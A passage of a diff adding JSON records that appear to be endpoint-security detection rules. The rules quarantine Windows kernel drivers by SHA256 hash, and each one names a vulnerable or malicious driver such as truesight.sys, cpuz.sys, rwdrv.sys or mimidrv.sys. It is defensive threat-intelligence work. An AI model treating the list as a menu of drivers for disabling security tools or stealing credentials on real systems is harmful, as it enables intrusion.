+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.815787Z",
+ "creation_date": "2026-03-23T11:45:31.815791Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.815799Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7e83096a0dcb5fecc798c4e0aac70c9bfa05801fdb75c723d7a539652837db8f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8269a3b1-365e-5497-8571-40e7d72a4717",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.823792Z",
+ "creation_date": "2026-03-23T11:45:31.823795Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.823804Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ea0f17275cd9620f94b482035cdf441a164771c997e84c0a997cfb48cb5db158",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "826b79d6-0b83-50a3-b474-5c79625b1b68",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.813985Z",
+ "creation_date": "2026-03-23T11:45:31.813988Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.813997Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5bfa6720e5972521751dd96257bb2e9d6bb264084dab8b6467dcb5710299c807",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "826f81b1-1f94-585c-adc3-dd28280fceb0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.149478Z",
+ "creation_date": "2026-03-23T11:45:31.149482Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.149491Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f838aec60dd23e9c02812dfd8dd0c2648cba2f5b8c2f8b289e5bb6a08f196dda",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "82721302-e015-509c-a6d2-b551d9cfdca9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.478074Z",
+ "creation_date": "2026-03-23T11:45:30.478078Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.478087Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c155197986db77be55716c49262ac009aefce647dae68268a2b9c7a7fd97c7a0",
+ "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "82742b7a-c6fa-5bb3-a8ae-8bcee41e5c1e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.141059Z",
+ "creation_date": "2026-03-23T11:45:31.141062Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.141067Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f41b603a0aa3b477d30afc420f72c3db16a18f8786422560f7eb632d1482d805",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "827e9cee-160f-51ce-a190-91ad08d35c87",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.148774Z",
+ "creation_date": "2026-03-23T11:45:31.148776Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.148781Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b02e0b4f09877897346b28501466e4dec0393127646021e0a816ac39618c5317",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8285f53d-3cf5-5e68-bf1f-7b1d6a1e432d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.811489Z",
+ "creation_date": "2026-03-23T11:45:31.811491Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.811496Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4a0149b64218c927cba80d302e6db403e9b4c6cbacb905070ff451303b7d26b5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8287b07b-56f0-5c4c-8d78-25491841c815",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.828755Z",
+ "creation_date": "2026-03-23T11:45:30.828757Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.828763Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f3935e0f74dd7996d9fd900eb7fb167ab301a00c6c9f9034428ee8b6a65502f1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "828f1d9e-9fbb-5944-bf12-1693491d7ca4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.151918Z",
+ "creation_date": "2026-03-23T11:45:31.151921Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.151930Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1ced1f634e780e4fef2f9b06268d8142207ca4294bbab677a923ec091f3baa3c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8293ebec-d168-59ca-bee7-f5c86dc906d4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.835322Z",
+ "creation_date": "2026-03-23T11:45:30.835325Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.835333Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "208146a5e37dabdc40c022a8adcf6d95861e5e651a037998b7fe505d0b46c178",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "829c81aa-6265-51ca-bc89-d3411ff74334",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.617041Z",
+ "creation_date": "2026-03-23T11:45:29.617043Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617048Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "af20c1b4eb703083979e6f4e211327495f7a0a27ace9a52bd22dd3737be7a8b1",
+ "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "82a14366-d713-5b46-a9f3-df5ca98f8fc3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.476831Z",
+ "creation_date": "2026-03-23T11:45:30.476835Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.476844Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6429f89dd7e9f8f7784736b6d3471be3c480d4eb4c9a573c698ede1dd64f5010",
+ "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "82a30800-b664-5b16-ba42-37bd938f6668",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.472620Z",
+ "creation_date": "2026-03-23T11:45:30.472624Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.472640Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b738eab6f3e32cec59d5f53c12f13862429d3db6756212bbcd78ba4b4dbc234c",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "82a910b2-1f2a-54fa-9631-0733d790c7a5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.464368Z",
+ "creation_date": "2026-03-23T11:45:30.464372Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.464381Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "29348ebe12d872c5f40e316a0043f7e5babe583374487345a79bad0ba93fbdfe",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "82a9226d-d49b-5a39-841d-7a8fa487b92e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.980803Z",
+ "creation_date": "2026-03-23T11:45:29.980805Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.980810Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f85cca4badff17d1aa90752153ccec77a68ad282b69e3985fdc4743eaea85004",
+ "comment": "Vulnerable Kernel Driver (aka IObitUnlocker.sys) [https://www.loldrivers.io/drivers/4bf4b425-10af-4cd4-88e6-beb4b947eb48/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "82ad7062-e6bf-5162-9aa8-576b401e2f4d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978738Z",
+ "creation_date": "2026-03-23T11:45:29.978740Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978746Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "18c909a2b8c5e16821d6ef908f56881aa0ecceeaccb5fa1e54995935fcfd12f7",
+ "comment": "Malicious Kernel Driver (aka gmer64.sys) [https://www.loldrivers.io/drivers/7ce8fb06-46eb-4f4f-90d5-5518a6561f15/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "82b7cda4-6ea1-5485-b5ae-7f8e65a772ac",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985286Z",
+ "creation_date": "2026-03-23T11:45:29.985288Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.985294Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a97e5c6cd926fa47ab1a69963169223cc669bd654a2f128165ba4ebe1d08bd17",
+ "comment": "Dangerous Physmem Kernel Driver (aka HwRwDrv.Sys) [https://www.loldrivers.io/drivers/e4609b54-cb25-4433-a75a-7a17f43cec00/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "82c51088-f701-5369-83cd-e66b7d6c03cf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.145169Z",
+ "creation_date": "2026-03-23T11:45:32.145171Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.145177Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3768122b8ab7a518d3717cabdfdd7d9592ec986b3f85d40064fdf99c6f569f6b",
+ "comment": "Malicious Kernel Driver (aka driver_5c308aed.sys) [https://www.loldrivers.io/drivers/647f72e7-f378-4908-946c-5e45fab448e8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "82d2ec3d-2beb-5a76-873b-26fd584267ed",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.490782Z",
+ "creation_date": "2026-03-23T11:45:31.490784Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.490789Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f4083b4353135cd29fbc32d2ecd1df91f86f667c93ddae3393158f6a126e98f4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "82d48878-dd67-501a-9a35-28f360c758d5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.468016Z",
+ "creation_date": "2026-03-23T11:45:30.468019Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.468029Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f2b0d70e2d55a5f69ddaac13460cfcd63746ac1c09f826772cca5b857dde240a",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "82d5e3f6-c043-55bb-9f82-dcb528f2e191",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982104Z",
+ "creation_date": "2026-03-23T11:45:29.982106Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982111Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3279593db91bb7ad5b489a01808c645eafafda6cc9c39f50d10ccc30203f2ddf",
+ "comment": "Vulnerable Kernel Driver (aka rwdrv.sys) [https://www.loldrivers.io/drivers/b03798af-d25a-400b-9236-4643a802846f/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "82d64303-ca93-567e-848b-5e6a53865f6d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.148980Z",
+ "creation_date": "2026-03-23T11:45:31.148982Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.148990Z",
